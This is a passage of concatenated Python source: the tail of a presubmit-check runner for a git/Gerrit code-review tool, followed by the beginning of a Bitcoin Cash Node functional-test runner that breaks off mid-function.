"""An iterator over all text lines in 'new' version of changed files.
Lists lines from new or modified text files in the change.
This is useful for doing line-by-line regex checks, like checking for
trailing whitespace.
Yields:
a 3 tuple:
the AffectedFile instance of the current file;
integer line number (1-based); and
the contents of the line as a string.
"""
return _RightHandSideLinesImpl(
x for x in self.AffectedFiles(include_deletes=False)
if x.IsTestableFile())
def OriginalOwnersFiles(self):
"""A map from path names of affected OWNERS files to their old content."""
def owners_file_filter(f):
return 'OWNERS' in os.path.split(f.LocalPath())[1]
files = self.AffectedFiles(file_filter=owners_file_filter)
return {f.LocalPath(): f.OldContents() for f in files}
class GitChange(Change):
_AFFECTED_FILES = GitAffectedFile
scm = 'git'
def AllFiles(self, root=None):
"""List all files under source control in the repo."""
root = root or self.RepositoryRoot()
return subprocess.check_output(
['git', '-c', 'core.quotePath=false', 'ls-files', '--', '.'],
cwd=root).decode('utf-8', 'ignore').splitlines()
def ListRelevantPresubmitFiles(files, root):
"""Finds all presubmit files that apply to a given set of source files.
If inherit-review-settings-ok is present right under root, looks for
PRESUBMIT.py in directories enclosing root.
Args:
files: An iterable container containing file paths.
root: Path where to stop searching.
Return:
List of absolute paths of the existing PRESUBMIT.py scripts.
"""
files = [normpath(os.path.join(root, f)) for f in files]
# List all the individual directories containing files.
directories = {os.path.dirname(f) for f in files}
# Ignore root if inherit-review-settings-ok is present.
if os.path.isfile(os.path.join(root, 'inherit-review-settings-ok')):
root = None
# Collect all unique directories that may contain PRESUBMIT.py.
candidates = set()
for directory in directories:
while True:
if directory in candidates:
break
candidates.add(directory)
if directory == root:
break
parent_dir = os.path.dirname(directory)
if parent_dir == directory:
# We hit the system root directory.
break
directory = parent_dir
# Look for PRESUBMIT.py in all candidate directories.
results = []
for directory in sorted(list(candidates)):
try:
for f in os.listdir(directory):
p = os.path.join(directory, f)
if os.path.isfile(p) and re.match(
r'PRESUBMIT.*\.py$', f) and not f.startswith('PRESUBMIT_test'):
results.append(p)
except OSError:
pass
logging.debug('Presubmit files: %s', ','.join(results))
return results
class GetPostUploadExecuter(object):
def __init__(self, use_python3):
"""
Args:
use_python3: if true, will use python3 instead of python2 by default
if USE_PYTHON3 is not specified.
"""
self.use_python3 = use_python3
def ExecPresubmitScript(self, script_text, presubmit_path, gerrit_obj,
change):
"""Executes PostUploadHook() from a single presubmit script.
Args:
script_text: The text of the presubmit script.
presubmit_path: Project script to run.
gerrit_obj: The GerritAccessor object.
change: The Change object.
Return:
A list of results objects.
"""
if not _ShouldRunPresubmit(script_text, self.use_python3):
return {}
context = {}
try:
exec(compile(script_text, 'PRESUBMIT.py', 'exec', dont_inherit=True),
context)
except Exception as e:
raise PresubmitFailure('"%s" had an exception.\n%s'
% (presubmit_path, e))
function_name = 'PostUploadHook'
if function_name not in context:
return {}
post_upload_hook = context[function_name]
if not len(inspect.getargspec(post_upload_hook)[0]) == 3:
raise PresubmitFailure(
'Expected function "PostUploadHook" to take three arguments.')
return post_upload_hook(gerrit_obj, change, OutputApi(False))
def _MergeMasters(masters1, masters2):
"""Merges two master maps. Merges also the tests of each builder."""
result = {}
for (master, builders) in itertools.chain(masters1.items(),
masters2.items()):
new_builders = result.setdefault(master, {})
for (builder, tests) in builders.items():
new_builders.setdefault(builder, set([])).update(tests)
return result
def DoPostUploadExecuter(change, gerrit_obj, verbose, use_python3=False):
"""Execute the post upload hook.
Args:
change: The Change object.
gerrit_obj: The GerritAccessor object.
verbose: Prints debug info.
use_python3: if true, default to using Python3 for presubmit checks
rather than Python2.
"""
python_version = 'Python %s' % sys.version_info.major
sys.stdout.write('Running %s post upload checks ...\n' % python_version)
presubmit_files = ListRelevantPresubmitFiles(
change.LocalPaths(), change.RepositoryRoot())
if not presubmit_files and verbose:
sys.stdout.write('Warning, no PRESUBMIT.py found.\n')
results = []
executer = GetPostUploadExecuter(use_python3)
# The root presubmit file should be executed after the ones in subdirectories.
# i.e. the specific post upload hooks should run before the general ones.
# Thus, reverse the order provided by ListRelevantPresubmitFiles.
presubmit_files.reverse()
for filename in presubmit_files:
filename = os.path.abspath(filename)
if verbose:
sys.stdout.write('Running %s\n' % filename)
# Accept CRLF presubmit script.
presubmit_script = gclient_utils.FileRead(filename, 'rU')
results.extend(executer.ExecPresubmitScript(
presubmit_script, filename, gerrit_obj, change))
if not results:
return 0
sys.stdout.write('\n')
sys.stdout.write('** Post Upload Hook Messages **\n')
exit_code = 0
for result in results:
if result.fatal:
exit_code = 1
result.handle()
sys.stdout.write('\n')
return exit_code
class PresubmitExecuter(object):
def __init__(self, change, committing, verbose, gerrit_obj, dry_run=None,
thread_pool=None, parallel=False, use_python3=False):
"""
Args:
change: The Change object.
committing: True if 'git cl land' is running, False if 'git cl upload' is.
gerrit_obj: provides basic Gerrit codereview functionality.
dry_run: if true, some Checks will be skipped.
parallel: if true, all tests reported via input_api.RunTests for all
PRESUBMIT files will be run in parallel.
use_python3: if true, will use python3 instead of python2 by default
if USE_PYTHON3 is not specified.
"""
self.change = change
self.committing = committing
self.gerrit = gerrit_obj
self.verbose = verbose
self.dry_run = dry_run
self.more_cc = []
self.thread_pool = thread_pool
self.parallel = parallel
self.use_python3 = use_python3
def ExecPresubmitScript(self, script_text, presubmit_path):
"""Executes a single presubmit script.
Args:
script_text: The text of the presubmit script.
presubmit_path: The path to the presubmit file (this will be reported via
input_api.PresubmitLocalPath()).
Return:
A list of result objects, empty if no problems.
"""
if not _ShouldRunPresubmit(script_text, self.use_python3):
return []
# Change to the presubmit file's directory to support local imports.
main_path = os.getcwd()
presubmit_dir = os.path.dirname(presubmit_path)
os.chdir(presubmit_dir)
# Load the presubmit script into context.
input_api = InputApi(self.change, presubmit_path, self.committing,
self.verbose, gerrit_obj=self.gerrit,
dry_run=self.dry_run, thread_pool=self.thread_pool,
parallel=self.parallel)
output_api = OutputApi(self.committing)
context = {}
try:
exec(compile(script_text, 'PRESUBMIT.py', 'exec', dont_inherit=True),
context)
except Exception as e:
raise PresubmitFailure('"%s" had an exception.\n%s' % (presubmit_path, e))
context['__args'] = (input_api, output_api)
# Get path of presubmit directory relative to repository root.
# Always use forward slashes, so that path is same in *nix and Windows
root = input_api.change.RepositoryRoot()
rel_path = os.path.relpath(presubmit_dir, root)
rel_path = rel_path.replace(os.path.sep, '/')
# Get the URL of git remote origin and use it to identify host and project
host = project = ''
if self.gerrit:
host = self.gerrit.host or ''
project = self.gerrit.project or ''
# Prefix for test names
prefix = 'presubmit:%s/%s:%s/' % (host, project, rel_path)
# Perform all the desired presubmit checks.
results = []
try:
version = [
int(x) for x in context.get('PRESUBMIT_VERSION', '0.0.0').split('.')
]
with rdb_wrapper.client(prefix) as sink:
if version >= [2, 0, 0]:
# Copy the keys to prevent "dictionary changed size during iteration"
# exception if checks add globals to context. E.g. sometimes the
# Python runtime will add __warningregistry__.
for function_name in list(context.keys()):
if not function_name.startswith('Check'):
continue
if function_name.endswith('Commit') and not self.committing:
continue
if function_name.endswith('Upload') and self.committing:
continue
logging.debug('Running %s in %s', function_name, presubmit_path)
results.extend(
self._run_check_function(function_name, context, sink))
logging.debug('Running %s done.', function_name)
self.more_cc.extend(output_api.more_cc)
else: # Old format
if self.committing:
function_name = 'CheckChangeOnCommit'
else:
function_name = 'CheckChangeOnUpload'
if function_name in list(context.keys()):
logging.debug('Running %s in %s', function_name, presubmit_path)
results.extend(
self._run_check_function(function_name, context, sink))
logging.debug('Running %s done.', function_name)
self.more_cc.extend(output_api.more_cc)
finally:
for f in input_api._named_temporary_files:
os.remove(f)
# Return the process to the original working directory.
os.chdir(main_path)
return results
def _run_check_function(self, function_name, context, sink=None):
"""Evaluates and returns the result of a given presubmit function.
If sink is given, the result of the presubmit function will be reported
to the ResultSink.
Args:
function_name: the name of the presubmit function to evaluate
context: a context dictionary in which the function will be evaluated
sink: an instance of ResultSink. None, by default.
Returns:
the result of the presubmit function call.
"""
start_time = time_time()
try:
result = eval(function_name + '(*__args)', context)
self._check_result_type(result)
except Exception:
if sink:
elapsed_time = time_time() - start_time
sink.report(function_name, rdb_wrapper.STATUS_FAIL, elapsed_time)
# TODO(crbug.com/953884): replace reraise with native py3:
# raise .. from e
e_type, e_value, e_tb = sys.exc_info()
print('Evaluation of %s failed: %s' % (function_name, e_value))
six.reraise(e_type, e_value, e_tb)
elapsed_time = time_time() - start_time
if elapsed_time > 10.0:
sys.stdout.write(
'%s took %.1fs to run.\n' % (function_name, elapsed_time))
if sink:
status = rdb_wrapper.STATUS_PASS
if any(r.fatal for r in result):
status = rdb_wrapper.STATUS_FAIL
sink.report(function_name, status, elapsed_time)
return result
def _check_result_type(self, result):
"""Helper function which ensures result is a list, and all elements are
instances of OutputApi.PresubmitResult"""
if not isinstance(result, (tuple, list)):
raise PresubmitFailure('Presubmit functions must return a tuple or list')
if not all(isinstance(res, OutputApi.PresubmitResult) for res in result):
raise PresubmitFailure(
'All presubmit results must be of types derived from '
'output_api.PresubmitResult')
def DoPresubmitChecks(change,
committing,
verbose,
default_presubmit,
may_prompt,
gerrit_obj,
dry_run=None,
parallel=False,
json_output=None,
use_python3=False):
"""Runs all presubmit checks that apply to the files in the change.
This finds all PRESUBMIT.py files in directories enclosing the files in the
change (up to the repository root) and calls the relevant entrypoint function
depending on whether the change is being committed or uploaded.
Prints errors, warnings and notifications. Prompts the user for warnings
when needed.
Args:
change: The Change object.
committing: True if 'git cl land' is running, False if 'git cl upload' is.
verbose: Prints debug info.
default_presubmit: A default presubmit script to execute in any case.
may_prompt: Enable (y/n) questions on warning or error. If False,
any questions are answered with yes by default.
gerrit_obj: provides basic Gerrit codereview functionality.
dry_run: if true, some Checks will be skipped.
parallel: if true, all tests specified by input_api.RunTests in all
PRESUBMIT files will be run in parallel.
use_python3: if true, default to using Python3 for presubmit checks
rather than Python2.
Return:
1 if presubmit checks failed or 0 otherwise.
"""
old_environ = os.environ
try:
# Make sure python subprocesses won't generate .pyc files.
os.environ = os.environ.copy()
os.environ['PYTHONDONTWRITEBYTECODE'] = '1'
python_version = 'Python %s' % sys.version_info.major
if committing:
sys.stdout.write('Running %s presubmit commit checks ...\n' %
python_version)
else:
sys.stdout.write('Running %s presubmit upload checks ...\n' %
python_version)
start_time = time_time()
presubmit_files = ListRelevantPresubmitFiles(
change.AbsoluteLocalPaths(), change.RepositoryRoot())
if not presubmit_files and verbose:
sys.stdout.write('Warning, no PRESUBMIT.py found.\n')
results = []
thread_pool = ThreadPool()
executer = PresubmitExecuter(change, committing, verbose, gerrit_obj,
dry_run, thread_pool, parallel, use_python3)
if default_presubmit:
if verbose:
sys.stdout.write('Running default presubmit script.\n')
fake_path = os.path.join(change.RepositoryRoot(), 'PRESUBMIT.py')
results += executer.ExecPresubmitScript(default_presubmit, fake_path)
for filename in presubmit_files:
filename = os.path.abspath(filename)
if verbose:
sys.stdout.write('Running %s\n' % filename)
# Accept CRLF presubmit script.
presubmit_script = gclient_utils.FileRead(filename, 'rU')
results += executer.ExecPresubmitScript(presubmit_script, filename)
results += thread_pool.RunAsync()
messages = {}
should_prompt = False
presubmits_failed = False
for result in results:
if result.fatal:
presubmits_failed = True
messages.setdefault('ERRORS', []).append(result)
elif result.should_prompt:
should_prompt = True
messages.setdefault('Warnings', []).append(result)
else:
messages.setdefault('Messages', []).append(result)
for name, items in messages.items():
sys.stdout.write('** Presubmit %s **\n' % name)
for item in items:
item.handle()
sys.stdout.write('\n')
total_time = time_time() - start_time
if total_time > 1.0:
sys.stdout.write(
'Presubmit checks took %.1fs to calculate.\n' % total_time)
if not should_prompt and not presubmits_failed:
sys.stdout.write('%s presubmit checks passed.\n\n' % python_version)
elif should_prompt and not presubmits_failed:
sys.stdout.write('There were %s presubmit warnings. ' % python_version)
if may_prompt:
presubmits_failed = not prompt_should_continue(
'Are you sure you wish to continue? (y/N): ')
else:
sys.stdout.write('\n')
if json_output:
# Write the presubmit results to json output
presubmit_results = {
'errors': [
error.json_format()
for error in messages.get('ERRORS', [])
],
'notifications': [
notification.json_format()
for notification in messages.get('Messages', [])
],
'warnings': [
warning.json_format()
for warning in messages.get('Warnings', [])
],
'more_cc': executer.more_cc,
}
gclient_utils.FileWrite(
json_output, json.dumps(presubmit_results, sort_keys=True))
global _ASKED_FOR_FEEDBACK
# Ask for feedback one time out of 5.
if (results and random.randint(0, 4) == 0 and not _ASKED_FOR_FEEDBACK):
sys.stdout.write(
'Was the presubmit check useful? If not, run "git cl presubmit -v"\n'
'to figure out which PRESUBMIT.py was run, then run git blame\n'
'on the file to figure out who to ask for help.\n')
_ASKED_FOR_FEEDBACK = True
return 1 if presubmits_failed else 0
finally:
os.environ = old_environ
def _scan_sub_dirs(mask, recursive):
if not recursive:
return [x for x in glob.glob(mask) if x not in ('.svn', '.git')]
results = []
for root, dirs, files in os.walk('.'):
if '.svn' in dirs:
dirs.remove('.svn')
if '.git' in dirs:
dirs.remove('.git')
for name in files:
if fnmatch.fnmatch(name, mask):
results.append(os.path.join(root, name))
return results
def _parse_files(args, recursive):
logging.debug('Searching for %s', args)
files = []
for arg in args:
files.extend([('M', f) for f in _scan_sub_dirs(arg, recursive)])
return files
def _parse_change(parser, options):
"""Process change options.
Args:
parser: The parser used to parse the arguments from command line.
options: The arguments parsed from command line.
Returns:
A GitChange if the change root is a git repository, or a Change otherwise.
"""
if options.files and options.all_files:
parser.error('<files> cannot be specified when --all-files is set.')
change_scm = scm.determine_scm(options.root)
if change_scm != 'git' and not options.files:
parser.error('<files> is not optional for unversioned directories.')
if options.files:
change_files = _parse_files(options.files, options.recursive)
elif options.all_files:
change_files = [('M', f) for f in scm.GIT.GetAllFiles(options.root)]
else:
change_files = scm.GIT.CaptureStatus(
options.root, options.upstream or None)
logging.info('Found %d file(s).', len(change_files))
change_class = GitChange if change_scm == 'git' else Change
return change_class(
options.name,
options.description,
options.root,
change_files,
options.issue,
options.patchset,
options.author,
upstream=options.upstream)
def _parse_gerrit_options(parser, options):
"""Process gerrit options.
SIDE EFFECTS: Modifies options.author and options.description from Gerrit if
options.gerrit_fetch is set.
Args:
parser: The parser used to parse the arguments from command line.
options: The arguments parsed from command line.
Returns:
A GerritAccessor object if options.gerrit_url is set, or None otherwise.
"""
gerrit_obj = None
if options.gerrit_url:
gerrit_obj = GerritAccessor(
url=options.gerrit_url,
project=options.gerrit_project,
branch=options.gerrit_branch)
if not options.gerrit_fetch:
return gerrit_obj
if not options.gerrit_url or not options.issue or not options.patchset:
parser.error(
'--gerrit_fetch requires --gerrit_url, --issue and --patchset.')
options.author = gerrit_obj.GetChangeOwner(options.issue)
options.description = gerrit_obj.GetChangeDescription(
options.issue, options.patchset)
logging.info('Got author: "%s"', options.author)
logging.info('Got description: """\n%s\n"""', options.description)
return gerrit_obj
@contextlib.contextmanager
def canned_check_filter(method_names):
filtered = {}
try:
for method_name in method_names:
if not hasattr(presubmit_canned_checks, method_name):
logging.warning('Skipping unknown "canned" check %s' % method_name)
continue
filtered[method_name] = getattr(presubmit_canned_checks, method_name)
setattr(presubmit_canned_checks, method_name, lambda *_a, **_kw: [])
yield
finally:
for name, method in filtered.items():
setattr(presubmit_canned_checks, name, method)
def main(argv=None):
parser = argparse.ArgumentParser(usage='%(prog)s [options] <files...>')
hooks = parser.add_mutually_exclusive_group()
hooks.add_argument('-c', '--commit', action='store_true',
help='Use commit instead of upload checks.')
hooks.add_argument('-u', '--upload', action='store_false', dest='commit',
help='Use upload instead of commit checks.')
hooks.add_argument('--post_upload', action='store_true',
help='Run post-upload commit hooks.')
parser.add_argument('-r', '--recursive', action='store_true',
help='Act recursively.')
parser.add_argument('-v', '--verbose', action='count', default=0,
help='Use 2 times for more debug info.')
parser.add_argument('--name', default='no name')
parser.add_argument('--author')
desc = parser.add_mutually_exclusive_group()
desc.add_argument('--description', default='', help='The change description.')
desc.add_argument('--description_file',
help='File to read change description from.')
parser.add_argument('--issue', type=int, default=0)
parser.add_argument('--patchset', type=int, default=0)
parser.add_argument('--root', default=os.getcwd(),
help='Search for PRESUBMIT.py up to this directory. '
'If inherit-review-settings-ok is present in this '
'directory, parent directories up to the root file '
'system directories will also be searched.')
parser.add_argument('--upstream',
help='Git only: the base ref or upstream branch against '
'which the diff should be computed.')
parser.add_argument('--default_presubmit')
parser.add_argument('--may_prompt', action='store_true', default=False)
parser.add_argument('--skip_canned', action='append', default=[],
help='A list of checks to skip which appear in '
'presubmit_canned_checks. Can be provided multiple times '
'to skip multiple canned checks.')
parser.add_argument('--dry_run', action='store_true', help=argparse.SUPPRESS)
parser.add_argument('--gerrit_url', help=argparse.SUPPRESS)
parser.add_argument('--gerrit_project', help=argparse.SUPPRESS)
parser.add_argument('--gerrit_branch', help=argparse.SUPPRESS)
parser.add_argument('--gerrit_fetch', action='store_true',
help=argparse.SUPPRESS)
parser.add_argument('--parallel', action='store_true',
help='Run all tests specified by input_api.RunTests in '
'all PRESUBMIT files in parallel.')
parser.add_argument('--json_output',
help='Write presubmit errors to json output.')
parser.add_argument('--all_files', action='store_true',
help='Mark all files under source control as modified.')
parser.add_argument('files', nargs='*',
help='List of files to be marked as modified when '
'executing presubmit or post-upload hooks. fnmatch '
'wildcards can also be used.')
parser.add_argument('--use-python3', action='store_true',
help='Use python3 for presubmit checks by default')
options = parser.parse_args(argv)
log_level = logging.ERROR
if options.verbose >= 2:
log_level = logging.DEBUG
elif options.verbose:
log_level = logging.INFO
log_format = ('[%(levelname).1s%(asctime)s %(process)d %(thread)d '
'%(filename)s] %(message)s')
logging.basicConfig(format=log_format, level=log_level)
if options.description_file:
options.description = gclient_utils.FileRead(options.description_file)
gerrit_obj = _parse_gerrit_options(parser, options)
change = _parse_change(parser, options)
try:
if options.post_upload:
return DoPostUploadExecuter(change, gerrit_obj, options.verbose,
options.use_python3)
with canned_check_filter(options.skip_canned):
return DoPresubmitChecks(
change,
options.commit,
options.verbose,
options.default_presubmit,
options.may_prompt,
gerrit_obj,
options.dry_run,
options.parallel,
options.json_output,
options.use_python3)
except PresubmitFailure as e:
print(e, file=sys.stderr)
print('Maybe your depot_tools is out of date?', file=sys.stderr)
return 2
if __name__ == '__main__':
fix_encoding.fix_encoding()
try:
sys.exit(main())
except KeyboardInterrupt:
sys.stderr.write('interrupted\n')
sys.exit(2)
|
test_runner.py
|
#!/usr/bin/env python3
# Copyright (c) 2014-2019 The Bitcoin Core developers
# Copyright (c) 2017-2020 The Bitcoin developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Run regression test suite.
This module calls down into individual test cases via subprocess. It will
forward all unrecognized arguments onto the individual test scripts.
Functional tests are disabled on Windows by default. Use --force to run them anyway.
For a description of arguments recognized by test scripts, see
`test/functional/test_framework/test_framework.py:BitcoinTestFramework.main`.
"""
import argparse
from collections import deque
import configparser
import datetime
import os
import time
import shutil
import sys
import subprocess
import tempfile
import re
import logging
import xml.etree.ElementTree as ET
import json
import threading
import multiprocessing
from queue import Queue, Empty
# Formatting. Default colors to empty strings.
BOLD, BLUE, RED, GREY = ("", ""), ("", ""), ("", ""), ("", "")
try:
# Make sure python thinks it can write unicode to its stdout
"\u2713".encode("utf_8").decode(sys.stdout.encoding)
TICK = "✓ "
CROSS = "✖ "
CIRCLE = "○ "
except UnicodeDecodeError:
TICK = "P "
CROSS = "x "
CIRCLE = "o "
if os.name == 'posix':
# primitive formatting on supported
# terminal via ANSI escape sequences:
BOLD = ('\033[0m', '\033[1m')
BLUE = ('\033[0m', '\033[0;34m')
RED = ('\033[0m', '\033[0;31m')
GREY = ('\033[0m', '\033[1;30m')
TEST_EXIT_PASSED = 0
TEST_EXIT_SKIPPED = 77
NON_SCRIPTS = [
# These are python files that live in the functional tests directory, but
# are not test scripts.
"combine_logs.py",
"create_cache.py",
"test_runner.py",
]
TEST_PARAMS = {
# Some test can be run with additional parameters.
# When a test is listed here, the it will be run without parameters
# as well as with additional parameters listed here.
# This:
# example "testName" : [["--param1", "--param2"] , ["--param3"]]
# will run the test 3 times:
# testName
# testName --param1 --param2
# testname --param3
"wallet_txn_doublespend.py": [["--mineblock"]],
"wallet_txn_clone.py": [["--mineblock"]],
"wallet_createwallet.py": [["--usecli"]],
"wallet_multiwallet.py": [["--usecli"]],
}
# Used to limit the number of tests, when list of tests is not provided on command line
# When --extended is specified, we run all tests,
# otherwise we select tests based on execution time.
DEFAULT_CUTOFF = 40
DEFAULT_JOBS = (multiprocessing.cpu_count() // 3) + 1
class TestCase():
"""
Data structure to hold and run information necessary to launch a test case.
"""
def __init__(self, test_num, test_case, tests_dir,
tmpdir, failfast_event, flags=None):
self.tests_dir = tests_dir
self.tmpdir = tmpdir
self.test_case = test_case
self.test_num = test_num
self.failfast_event = failfast_event
self.flags = flags
def run(self, portseed_offset):
if self.failfast_event.is_set():
return TestResult(self.test_num, self.test_case,
"", "Skipped", 0, "", "")
portseed = self.test_num + portseed_offset
portseed_arg = ["--portseed={}".format(portseed)]
log_stdout = tempfile.SpooledTemporaryFile(max_size=2**16)
log_stderr = tempfile.SpooledTemporaryFile(max_size=2**16)
test_argv = self.test_case.split()
testdir = os.path.join("{}", "{}_{}").format(
self.tmpdir, re.sub(".py$", "", test_argv[0]), portseed)
tmpdir_arg = ["--tmpdir={}".format(testdir)]
time0 = time.time()
process = subprocess.Popen([sys.executable, os.path.join(self.tests_dir, test_argv[0])] + test_argv[1:] + self.flags + portseed_arg + tmpdir_arg,
universal_newlines=True,
stdout=log_stdout,
stderr=log_stderr)
process.wait()
log_stdout.seek(0), log_stderr.seek(0)
[stdout, stderr] = [log.read().decode('utf-8')
for log in (log_stdout, log_stderr)]
log_stdout.close(), log_stderr.close()
if process.returncode == TEST_EXIT_PASSED and stderr == "":
status = "Passed"
elif process.returncode == TEST_EXIT_SKIPPED:
status = "Skipped"
else:
status = "Failed"
return TestResult(self.test_num, self.test_case, testdir, status,
int(time.time() - time0), stdout, stderr)
def on_ci():
return os.getenv('TRAVIS') == 'true' or os.getenv(
'TEAMCITY_VERSION') is not None
def main():
# Read config generated by configure.
config = configparser.ConfigParser()
configfile = os.path.join(os.path.abspath(
os.path.dirname(__file__)), "..", "config.ini")
config.read_file(open(configfile, encoding="utf8"))
src_dir = config["environment"]["SRCDIR"]
build_dir = config["environment"]["BUILDDIR"]
tests_dir = os.path.join(src_dir, 'test', 'functional')
# Parse arguments and pass through unrecognised args
parser = argparse.ArgumentParser(add_help=False,
usage='%(prog)s [test_runner.py options] [script options] [scripts]',
description=__doc__,
epilog='''
Help text and arguments for individual test script:''',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--combinedlogslen', '-c', type=int, default=0,
help='Print a combined log (of length n lines) from all test nodes and test framework to the console on failure.')
parser.add_argument('--coverage', action='store_true',
help='Generate a basic coverage report for the RPC interface.')
parser.add_argument(
'--exclude', '-x', help='Specify a comma-separated-list of tests to exclude.')
parser.add_argument('--extended', action='store_true',
help='Run all tests in the test suite regardless of runtime. Ignores --cutoff and --startfrom.')
parser.add_argument('--cutoff', type=int, default=DEFAULT_CUTOFF,
help='Skip tests with at least this runtime. Does not affect any new (i.e. untimed) tests.')
parser.add_argument('--startfrom', type=int, default=argparse.SUPPRESS,
help='Only run tests with at least this runtime. Skips any new (i.e. untimed) tests. Ignores --cutoff.')
parser.add_argument('--force', '-f', action='store_true',
help='Run tests even on platforms where they are disabled by default (e.g. Windows).')
parser.add_argument('--help', '-h', '-?',
action='store_true', help='Show this help text and exit.')
parser.add_argument('--jobs', '-j', type=int, default=DEFAULT_JOBS,
help='How many test scripts to run in parallel.')
parser.add_argument('--keepcache', '-k', action='store_true',
help='The default behavior is to flush the cache directory on startup. --keepcache retains the cache from the previous testrun.')
parser.add_argument('--quiet', '-q', action='store_true',
help='Only print results summary and failure logs.')
parser.add_argument('--tmpdirprefix', '-t',
default=os.path.join(build_dir, 'test', 'tmp'), help="Root directory for datadirs")
parser.add_argument(
'--failfast',
action='store_true',
help='stop execution after the first test failure')
parser.add_argument('--junitoutput', '-J', default='junit_results.xml',
help="File that will store JUnit formatted test results. If no absolute path is given it is treated as relative to the temporary directory.")
parser.add_argument('--testsuitename', '-n', default='Bitcoin Cash Node functional tests',
help="Name of the test suite, as it will appear in the logs and in the JUnit report.")
args, unknown_args = parser.parse_known_args()
# args to be passed on always start with two dashes; tests are the
# remaining unknown args
tests = [arg for arg in unknown_args if arg[:2] != "--"]
passon_args = [arg for arg in unknown_args if arg[:2] == "--"]
passon_args.append("--configfile={}".format(configfile))
# Set up logging
logging_level = logging.INFO if args.quiet else logging.DEBUG
logging.basicConfig(format='%(message)s', level=logging_level)
logging.info("Starting {}".format(args.testsuitename))
# Create base test directory
tmpdir = os.path.join("{}", "bitcoin_test_runner_{:%Y%m%d_%H%M%S}").format(
args.tmpdirprefix, datetime.datetime.now())
os.makedirs(tmpdir)
logging.debug("Temporary test directory at {}".format(tmpdir))
if not os.path.isabs(args.junitoutput):
args.junitoutput = os.path.join(tmpdir, args.junitoutput)
enable_bitcoind = config["components"].getboolean("ENABLE_BITCOIND")
if config["environment"]["EXEEXT"] == ".exe" and not args.force:
# https://github.com/bitcoin/bitcoin/commit/d52802551752140cf41f0d9a225a43e84404d3e9
# https://github.com/bitcoin/bitcoin/pull/5677#issuecomment-136646964
print(
"Tests currently disabled on Windows by default. Use --force option to enable")
sys.exit(0)
if not enable_bitcoind:
print("No functional tests to run.")
print("Rerun ./configure with --with-daemon and then make")
sys.exit(0)
# Build list of tests
all_scripts = get_all_scripts_from_disk(tests_dir, NON_SCRIPTS)
# Check all tests with parameters actually exist
for test in TEST_PARAMS:
if test not in all_scripts:
print("ERROR: Test with parameter {} does not exist, check it has "
"not been renamed or deleted".format(test))
sys.exit(1)
if tests:
# Individual tests have been specified. Run specified tests that exist
# in the all_scripts list. Accept the name with or without .py
# extension.
individual_tests = [
re.sub(r"\.py$", "", t) + ".py" for t in tests if not t.endswith('*')]
test_list = []
for t in individual_tests:
if t in all_scripts:
test_list.append(t)
else:
print("{}WARNING!{} Test '{}' not found in full test list.".format(
BOLD[1], BOLD[0], t))
# Allow for wildcard at the end of the name, so a single input can
# match multiple tests
for test in tests:
if test.endswith('*'):
test_list.extend(
[t for t in all_scripts if t.startswith(test[:-1])])
# do not cut off explicitly specified tests
cutoff = sys.maxsize
startfrom = 0
else:
# No individual tests have been specified.
# Run all tests that do not exceed
test_list = all_scripts
if args.extended:
cutoff = sys.maxsize
startfrom = 0
elif 'startfrom' in args:
cutoff = sys.maxsize
startfrom = args.startfrom
else:
cutoff = args.cutoff
startfrom = 0
# Remove the test cases that the user has explicitly asked to exclude.
if args.exclude:
tests_excl = [re.sub(r"\.py$", "", t)
+ ".py" for t in args.exclude.split(',')]
for exclude_test in tests_excl:
if exclude_test in test_list:
test_list.remove(exclude_test)
else:
print("{}WARNING!{} Test '{}' not found in current test list.".format(
BOLD[1], BOLD[0], exclude_test))
# Update timings from build_dir only if separate build directory is used.
# We do not want to pollute source directory.
build_timings = None
if (src_dir != build_dir):
build_timings = Timings(os.path.join(build_dir, 'timing.json'))
# Always use timings from scr_dir if present
src_timings = Timings(os.path.join(
src_dir, "test", "functional", 'timing.json'))
# Add test parameters and remove long running tests if needed
test_list = get_tests_to_run(
test_list, TEST_PARAMS, cutoff, startfrom, src_timings)
if not test_list:
print("No valid test scripts specified. Check that your test is in one "
"of the test lists in test_runner.py, or run test_runner.py with no arguments to run all tests")
sys.exit(0)
if args.help:
# Print help for test_runner.py, then print help of the first script
# and exit.
parser.print_help()
subprocess.check_call(
[sys.executable, os.path.join(tests_dir, test_list[0]), '-h'])
sys.exit(0)
check_script_prefixes(all_scripts)
if not args.keepcache:
shutil.rmtree(os.path.join(build_dir, "test",
"cache"), ignore_errors=True)
run_tests(
test_list,
build_dir,
tests_dir,
args.junitoutput,
tmpdir,
num_jobs=args.jobs,
test_suite_name=args.testsuitename,
enable_coverage=args.coverage,
args=passon_args,
combined_logs_len=args.combinedlogslen,
build_timings=build_timings,
failfast=args.failfast
)
def run_tests(test_list, build_dir, tests_dir, junitoutput, tmpdir, num_jobs, test_suite_name,
enable_coverage=False, args=None, combined_logs_len=0, build_timings=None, failfast=False):
args = args or []
# Warn if bitcoind is already running (unix only)
try:
pidofOutput = subprocess.check_output(["pidof", "bitcoind"])
if pidofOutput is not None and pidofOutput != b'':
print("{}WARNING!{} There is already a bitcoind process running on this system. Tests may fail unexpectedly due to resource contention!".format(
BOLD[1], BOLD[0]))
except (OSError, subprocess.SubprocessError):
pass
# Warn if there is a cache directory
cache_dir = os.path.join(build_dir, "test", "cache")
if os.path.isdir(cache_dir):
print("{}WARNING!{} There is a cache directory here: {}. If tests fail unexpectedly, try deleting the cache directory.".format(
BOLD[1], BOLD[0], cache_dir))
flags = ['--cachedir={}'.format(cache_dir)] + args
if enable_coverage:
coverage = RPCCoverage()
flags.append(coverage.flag)
logging.debug(
"Initializing coverage directory at {}".format(coverage.dir))
else:
coverage = None
if len(test_list) > 1 and num_jobs > 1:
# Populate cache
try:
subprocess.check_output([sys.executable, os.path.join(
tests_dir, 'create_cache.py')] + flags + [os.path.join("--tmpdir={}", "cache") .format(tmpdir)])
except subprocess.CalledProcessError as e:
sys.stdout.buffer.write(e.output)
raise
# Run Tests
time0 = time.time()
test_results = execute_test_processes(
num_jobs, test_list, tests_dir, tmpdir, flags, failfast)
runtime = int(time.time() - time0)
max_len_name = len(max(test_list, key=len))
print_results(test_results, tests_dir, max_len_name,
runtime, combined_logs_len)
save_results_as_junit(test_results, junitoutput, runtime, test_suite_name)
if (build_timings is not None):
build_timings.save_timings(test_results)
if coverage:
coverage_passed = coverage.report_rpc_coverage()
logging.debug("Cleaning up coverage data")
coverage.cleanup()
else:
coverage_passed = True
# Clear up the temp directory if all subdirectories are gone
if not os.listdir(tmpdir):
